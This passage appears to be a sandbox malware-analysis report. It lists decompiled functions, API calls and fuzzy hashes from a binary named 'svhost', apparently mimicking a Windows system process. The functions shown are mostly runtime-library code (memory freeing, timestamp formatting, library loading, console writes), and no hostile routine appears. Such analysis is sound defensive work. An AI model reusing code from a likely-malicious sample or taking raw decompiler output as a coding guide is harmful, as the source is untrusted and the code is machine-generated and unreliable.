                                      0x00eaf02a
                                      0x00eaf02c
                                      0x00eaf031
                                      0x00eaf037
                                      0x00eaf040
                                      0x00eaf049
                                      0x00eaf049
                                      0x00000000
                                      0x00eaf02c
                                      0x00eaf0e9
                                      0x00eaf0e9
                                      0x00eaf0ed
                                      0x00eaf0f5
                                      0x00eaf0fb
                                      0x00eaf0fe
                                      0x00eaf104
                                      0x00eaf106
                                      0x00eaf152
                                      0x00eaf158
                                      0x00eaf15f
                                      0x00eaf15f
                                      0x00eaf165
                                      0x00eaf169
                                      0x00000000
                                      0x00eaf16b
                                      0x00eaf16f
                                      0x00eaf178
                                      0x00eaf184
                                      0x00eaf192
                                      0x00eaf198
                                      0x00eaf19b
                                      0x00eaf19b
                                      0x00eaf169
                                      0x00eaf1aa
                                      0x00eaf1b2
                                      0x00eaf1bb
                                      0x00eaf108
                                      0x00eaf10e
                                      0x00eaf118
                                      0x00eaf12a
                                      0x00eaf131
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf13e
                                      0x00000000
                                      0x00eaf106
                                      0x00eaef61
                                      0x00eaeed9
                                      0x00eaf143
                                      0x00eaf146
                                      0x00eaf147
                                      0x00eaf14a
                                      0x00eaf151
                                      0x00eaf151
                                      0x00000000
                                      0x00eaeed7
                                      0x00eaeed0
                                      0x00eaeed2
                                      0x00eaeed2
                                      0x00000000
                                      0x00eaeed2
                                      0x00000000

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • _free.LIBCMT ref: 00EAF118
                                      • _free.LIBCMT ref: 00EAF131
                                      • _free.LIBCMT ref: 00EAF16F
                                      • _free.LIBCMT ref: 00EAF178
                                      • _free.LIBCMT ref: 00EAF184
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorLast
                                      • String ID: C
                                      • API String ID: 3291180501-1037565863
                                      • Opcode ID: 8619bd7c37d2fa57bc4898d55e450b58da3f2351a407c573d9701cd6ff948bfa
                                      • Instruction ID: e4c06237cc0d163ba14028c077a64736190c68b6b8ee84b6f3cf7a07d81f113c
                                      • Opcode Fuzzy Hash: 8619bd7c37d2fa57bc4898d55e450b58da3f2351a407c573d9701cd6ff948bfa
                                      • Instruction Fuzzy Hash: E8B12775A012199FDB24DF28C894AAEB7B5FF59304F1095EAE809AB351D731BE80CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E70610 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00E70610(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v52;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				char _v89;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v132;
				signed int _t40;
				signed int _t41;
				void* _t47;
				void* _t56;
				intOrPtr* _t57;
				void* _t69;
				intOrPtr _t73;
				void* _t94;
				void* _t95;
				signed int _t96;

				_t95 = __esi;
				_t94 = __edi;
				_t69 = __ebx;
				_push(0xffffffff);
				_push(0xec1990);
				_push( *[fs:0x0]);
				_t40 =  *0xeef074; // 0x221cac15
				_t41 = _t40 ^ _t96;
				_v20 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v16;
				_v100 = __ecx;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				E00E6F2A0( &_v28);
				E00E6F2C0( &_v88,  &_v28);
				if(_v84 != 0x3b) {
					_t73 = _v84 + _a8;
					__eflags = _t73;
					_v84 = _t73;
				} else {
					_t106 = _v80 - 0x17;
					if(_v80 >= 0x17) {
						_v80 = 0;
					} else {
						_v80 = _v80 + 1;
					}
					_v84 = 0;
				}
				E00E66310(_t69,  &_v52, _t94, _t95, _t106, 0x104, 0);
				_t92 =  &_v88;
				_t47 = E00E57A20( &_v52);
				_v96 = E00EA5509(E00E634C0( &_v52, 0), _t47, "%Y-%m-%dT%H:%M:%S",  &_v88);
				_t107 = _v96;
				if(_v96 <= 0) {
					E00E57CD0(_t69, _a4, _t94, _t95, __eflags, 0xee4e10);
					E00E57F50( &_v52);
				} else {
					asm("lfence");
					E00E66280(_t69,  &_v52, _t94, _t95, _v96, 0);
					_t56 = E00E51100( &_v89);
					_t57 = E00E707D0( &_v104,  &_v52);
					_t92 =  &_v108;
					E00E57BA0(_a4, E00E51650(E00E707F0(_t69,  &_v132, _t94, _t95, _t107,  *((intOrPtr*)(E00E707B0( &_v108,  &_v52))),  *_t57, _t56)));
					E00E57B40( &_v132);
					E00E57F50( &_v52);
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t69, _v20 ^ _t96, _t92, _t94, _t95);
			}


























                                      0x00e70610
                                      0x00e70610
                                      0x00e70610
                                      0x00e70613
                                      0x00e70615
                                      0x00e70620
                                      0x00e70624
                                      0x00e70629
                                      0x00e7062b
                                      0x00e7062e
                                      0x00e70632
                                      0x00e70638
                                      0x00e7063b
                                      0x00e7063e
                                      0x00e70647
                                      0x00e70657
                                      0x00e70663
                                      0x00e70689
                                      0x00e70689
                                      0x00e7068c
                                      0x00e70665
                                      0x00e70665
                                      0x00e70669
                                      0x00e70676
                                      0x00e7066b
                                      0x00e70671
                                      0x00e70671
                                      0x00e7067d
                                      0x00e7067d
                                      0x00e70699
                                      0x00e7069e
                                      0x00e706aa
                                      0x00e706c3
                                      0x00e706c6
                                      0x00e706ca
                                      0x00e70743
                                      0x00e7074b
                                      0x00e706cc
                                      0x00e706cc
                                      0x00e706d8
                                      0x00e706e0
                                      0x00e706ee
                                      0x00e706fd
                                      0x00e70721
                                      0x00e70729
                                      0x00e70731
                                      0x00e70736
                                      0x00e70756
                                      0x00e7076b

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$_strftime
                                      • String ID: %Y-%m-%dT%H:%M:%S$;
                                      • API String ID: 517022210-3532145019
                                      • Opcode ID: 3367413891d44516f70661807741676cb2b2b77425451e247dd7fb4b485115f4
                                      • Instruction ID: ba581bf47c66a41def84177ca482f968006f561a71adefb0228068912b303be8
                                      • Opcode Fuzzy Hash: 3367413891d44516f70661807741676cb2b2b77425451e247dd7fb4b485115f4
                                      • Instruction Fuzzy Hash: F9410EB1D10208ABCB04EBD4DC92FEEB7B4BF54704F409529F5167B291EB706618CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E5F020 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameName::
                                      • String ID: !$!
                                      • API String ID: 1333004437-1572258622
                                      • Opcode ID: 3435617c62f624a531917cb7ecc740559894b0846dd478e0419a87ca89011808
                                      • Instruction ID: 603d7702db0e9e5075324d3097ac5a871121b38e75b495062b0a5e1fa1aab87a
                                      • Opcode Fuzzy Hash: 3435617c62f624a531917cb7ecc740559894b0846dd478e0419a87ca89011808
                                      • Instruction Fuzzy Hash: 9831A774D002099FCB04DF98D5919DEBBF1AF88341F14D56AE816BB351EB31AA05CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB1325 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB1325(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xef3660 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xecb0a8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00EB0488(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00EB0488(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}













                                      0x00eb132e
                                      0x00eb13d8
                                      0x00eb1336
                                      0x00eb1338
                                      0x00eb133f
                                      0x00eb1341
                                      0x00eb1347
                                      0x00eb1354
                                      0x00eb1369
                                      0x00eb136d
                                      0x00eb13bf
                                      0x00eb13bf
                                      0x00eb13c4
                                      0x00eb13c8
                                      0x00eb13cb
                                      0x00eb13cb
                                      0x00eb13d1
                                      0x00eb13d3
                                      0x00eb13e8
                                      0x00eb13e3
                                      0x00eb13e7
                                      0x00eb13e7
                                      0x00eb13d5
                                      0x00eb13d5
                                      0x00000000
                                      0x00eb13d5
                                      0x00eb136f
                                      0x00eb1378
                                      0x00eb13af
                                      0x00eb13af
                                      0x00eb13b1
                                      0x00eb13b3
                                      0x00000000
                                      0x00000000
                                      0x00eb13bb
                                      0x00000000
                                      0x00eb13bb
                                      0x00eb1382
                                      0x00eb1387
                                      0x00eb138c
                                      0x00000000
                                      0x00000000
                                      0x00eb1396
                                      0x00eb139b
                                      0x00eb13a0
                                      0x00000000
                                      0x00000000
                                      0x00eb13a5
                                      0x00eb13ab
                                      0x00000000
                                      0x00eb13ab
                                      0x00eb134c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb1352
                                      0x00eb13e1
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-$ext-ms-
                                      • API String ID: 0-537541572
                                      • Opcode ID: e5ede770d697496429cea89e73abc2d54e7bdf37387314a956de6dd476e21c2c
                                      • Instruction ID: 18ac6d89bb581a8d93408df838fb9d90d0dd411416ee12d486c542dfdffb27d2
                                      • Opcode Fuzzy Hash: e5ede770d697496429cea89e73abc2d54e7bdf37387314a956de6dd476e21c2c
                                      • Instruction Fuzzy Hash: 9F210572A04320EFCB218B269C51EEF37D89B01774F6621A0E811B76E0F671ED0186E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB821C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EB821C(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00EB7F68(_t45, 7);
					E00EB7F68(_t45 + 0x1c, 7);
					E00EB7F68(_t45 + 0x38, 0xc);
					E00EB7F68(_t45 + 0x68, 0xc);
					E00EB7F68(_t45 + 0x98, 2);
					E00EB051F( *((intOrPtr*)(_t45 + 0xa0)));
					E00EB051F( *((intOrPtr*)(_t45 + 0xa4)));
					E00EB051F( *((intOrPtr*)(_t45 + 0xa8)));
					E00EB7F68(_t45 + 0xb4, 7);
					E00EB7F68(_t45 + 0xd0, 7);
					E00EB7F68(_t45 + 0xec, 0xc);
					E00EB7F68(_t45 + 0x11c, 0xc);
					E00EB7F68(_t45 + 0x14c, 2);
					E00EB051F( *((intOrPtr*)(_t45 + 0x154)));
					E00EB051F( *((intOrPtr*)(_t45 + 0x158)));
					E00EB051F( *((intOrPtr*)(_t45 + 0x15c)));
					return E00EB051F( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                      0x00eb8222
                                      0x00eb8227
                                      0x00eb8230
                                      0x00eb823b
                                      0x00eb8246
                                      0x00eb8251
                                      0x00eb825f
                                      0x00eb826a
                                      0x00eb8275
                                      0x00eb8280
                                      0x00eb828e
                                      0x00eb829c
                                      0x00eb82ad
                                      0x00eb82bb
                                      0x00eb82c9
                                      0x00eb82d4
                                      0x00eb82df
                                      0x00eb82ea
                                      0x00000000
                                      0x00eb82fa
                                      0x00eb82ff

                                      APIs
                                        • Part of subcall function 00EB7F68: _free.LIBCMT ref: 00EB7F8D
                                      • _free.LIBCMT ref: 00EB826A
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      • _free.LIBCMT ref: 00EB8275
                                      • _free.LIBCMT ref: 00EB8280
                                      • _free.LIBCMT ref: 00EB82D4
                                      • _free.LIBCMT ref: 00EB82DF
                                      • _free.LIBCMT ref: 00EB82EA
                                      • _free.LIBCMT ref: 00EB82F5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a6ad70abe4311e6f8f727da59bf6d8b5c616b0ec9788bcd32628e3c1026de0e9
                                      • Instruction ID: bb79bc42df0698306e196b848ec8927866afaa3a675fa0e8476c5f43c27ed213
                                      • Opcode Fuzzy Hash: a6ad70abe4311e6f8f727da59bf6d8b5c616b0ec9788bcd32628e3c1026de0e9
                                      • Instruction Fuzzy Hash: 13114F71689B08AAD930B7B0CC07FDBB7DD5F40700F401C29B2D976A92DA65F905CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EBA143 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 68%
                                      			E00EBA143(void* __eflags, void* _a4, signed int _a8, signed char _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed char _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed char _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed char _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t172;
				signed int _t174;
				intOrPtr _t176;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				signed char _t235;
				struct _OVERLAPPED* _t243;
				void* _t244;
				signed int _t247;
				intOrPtr _t250;
				signed char _t253;
				signed int _t254;
				signed char _t256;
				struct _OVERLAPPED* _t257;
				intOrPtr _t259;
				void* _t263;
				signed char _t264;
				void* _t265;
				void* _t267;
				long _t270;
				void* _t272;
				signed int _t274;
				long _t275;
				struct _OVERLAPPED* _t276;
				signed int _t278;
				intOrPtr _t280;
				void* _t282;
				signed int _t283;
				signed int _t286;
				long _t287;
				long _t288;
				signed char _t289;
				intOrPtr _t290;
				signed int _t292;
				signed int _t294;
				void* _t295;
				void* _t297;

				_t292 = _t294;
				_t295 = _t294 - 0x8c;
				_t172 =  *0xeef074; // 0x221cac15
				_v8 = _t172 ^ _t292;
				_t174 = _a8;
				_t264 = _a12;
				_t278 = (_t174 & 0x0000003f) * 0x38;
				_t247 = _t174 >> 6;
				_v112 = _t264;
				_v84 = _t247;
				_t176 =  *((intOrPtr*)(0xef3820 + _t247 * 4));
				_v80 = _t278;
				_t10 = _t176 + 0x18; // 0x28c183f0
				_t280 = _a16 + _t264;
				_v116 =  *((intOrPtr*)(_t278 + _t10));
				_v104 = _t280;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E00EA49BF( &_v72, _t264, 0);
				asm("stosd");
				_t250 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t250;
				asm("stosd");
				asm("stosd");
				_t270 = _v112;
				_v40 = _t270;
				if(_t270 >= _t280) {
					L53:
					__eflags = _v60 - _t243;
				} else {
					_t283 = _v92;
					while(1) {
						_v47 =  *_t270;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0xef3820 + _v84 * 4));
						_v52 = _t186;
						if(_t250 != 0xfde9) {
							goto L24;
						}
						_t264 = _v80;
						_t212 = _t186 + 0x2e + _t264;
						_t257 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t257)) != _t243) {
							_t257 =  &(_t257->Internal);
							if(_t257 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t274 = _v104 - _t213;
						_v44 = _t257;
						if(_t257 <= 0) {
							_t259 =  *((char*)(( *_t213 & 0x000000ff) + 0xeef960)) + 1;
							_v52 = _t259;
							__eflags = _t259 - _t274;
							if(_t259 > _t274) {
								__eflags = _t274;
								if(_t274 <= 0) {
									goto L45;
								} else {
									_t287 = _v40;
									do {
										_t265 = _t243 + _t264;
										_t216 =  *((intOrPtr*)(_t243 + _t287));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t265 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e)) = _t216;
										_t264 = _v80;
										__eflags = _t243 - _t274;
									} while (_t243 < _t274);
									goto L44;
								}
							} else {
								_t275 = _v40;
								__eflags = _t259 - 4;
								_v144 = _t243;
								_t261 =  &_v144;
								_v140 = _t243;
								_v56 = _t275;
								_t219 = (0 | _t259 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L22;
							}
						} else {
							_t228 =  *((char*)(( *(_t264 + _v52 + 0x2e) & 0x000000ff) + 0xeef960)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t257;
							_v52 = _t229;
							if(_t229 > _t274) {
								__eflags = _t274;
								if(_t274 > 0) {
									_t288 = _v40;
									do {
										_t267 = _t243 + _t264 + _t257;
										_t231 =  *((intOrPtr*)(_t243 + _t288));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t267 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e)) = _t231;
										_t257 = _v44;
										_t264 = _v80;
										__eflags = _t243 - _t274;
									} while (_t243 < _t274);
									L44:
									_t283 = _v92;
								}
								L45:
								_t286 = _t283 + _t274;
								__eflags = _t286;
								L46:
								__eflags = _v60;
								_v92 = _t286;
							} else {
								_t264 = _t243;
								if(_t257 > 0) {
									_t290 = _v108;
									do {
										 *((char*)(_t292 + _t264 - 0xc)) =  *((intOrPtr*)(_t290 + _t264));
										_t264 = _t264 + 1;
									} while (_t264 < _t257);
									_t229 = _v52;
								}
								_t275 = _v40;
								if(_t229 > 0) {
									E00EA0CF0( &_v16 + _t257, _t275, _v52);
									_t257 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t257 > 0) {
									_t264 = _v44;
									_t276 = _t243;
									_t289 = _v80;
									do {
										_t263 = _t276 + _t289;
										_t276 =  &(_t276->Internal);
										 *(_t263 +  *((intOrPtr*)(0xef3820 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t276 < _t264);
									_t275 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t261 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L22:
								_push(_t220);
								_push( &_v76);
								_t222 = E00EBB153(_t261);
								_t297 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L53;
								} else {
									_t270 = _t275 + _v52 - 1;
									L32:
									_t270 = _t270 + 1;
									_v40 = _t270;
									_t193 = E00EB2838(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t297 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L53;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L52:
											_v96 = GetLastError();
											goto L53;
										} else {
											_t283 = _v88 - _v112 + _t270;
											_v92 = _t283;
											if(_v100 < _v56) {
												goto L53;
											} else {
												if(_v47 != 0xa) {
													L39:
													if(_t270 >= _v104) {
														goto L53;
													} else {
														_t250 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L52;
													} else {
														if(_v100 < 1) {
															goto L53;
														} else {
															_v88 = _v88 + 1;
															_t283 = _t283 + 1;
															_v92 = _t283;
															goto L39;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L54;
						L24:
						_t253 = _v80;
						_t264 =  *((intOrPtr*)(_t253 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E00EAAFAD(_t264);
							_t254 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t254 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t254 * 2)) >= _t243) {
								_push(1);
								_push(_t270);
								goto L31;
							} else {
								_t202 = _t270 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t264 = _v84;
									_t256 = _v80;
									 *((char*)(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2d) =  *(_t256 +  *((intOrPtr*)(0xef3820 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t286 = _t283 + 1;
									goto L46;
								} else {
									_t206 = E00EB3D67( &_v76, _t270, 2);
									_t297 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L53;
									} else {
										_t270 = _v56;
										goto L32;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t253 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t253 + _v52 + 0x2d) = _t264;
							_push( &_v24);
							L31:
							_push( &_v76);
							_t190 = E00EB3D67();
							_t297 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L53;
							} else {
								goto L32;
							}
						}
						goto L54;
					}
				}
				L54:
				if(__eflags != 0) {
					_t183 = _v72;
					_t167 = _t183 + 0x350;
					 *_t167 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t167;
				}
				__eflags = _v8 ^ _t292;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_pop(_t272);
				_pop(_t282);
				_pop(_t244);
				return E00E89A35(_t244, _v8 ^ _t292, _t264, _t272, _t282);
			}




























































































                                      0x00eba146
                                      0x00eba148
                                      0x00eba14e
                                      0x00eba155
                                      0x00eba158
                                      0x00eba15d
                                      0x00eba165
                                      0x00eba168
                                      0x00eba16c
                                      0x00eba16f
                                      0x00eba172
                                      0x00eba179
                                      0x00eba17c
                                      0x00eba183
                                      0x00eba185
                                      0x00eba188
                                      0x00eba18b
                                      0x00eba191
                                      0x00eba193
                                      0x00eba19a
                                      0x00eba1a7
                                      0x00eba1a8
                                      0x00eba1ab
                                      0x00eba1ae
                                      0x00eba1af
                                      0x00eba1b0
                                      0x00eba1b3
                                      0x00eba1b8
                                      0x00eba4c4
                                      0x00eba4c4
                                      0x00eba1be
                                      0x00eba1be
                                      0x00eba1c1
                                      0x00eba1c3
                                      0x00eba1c9
                                      0x00eba1cc
                                      0x00eba1d3
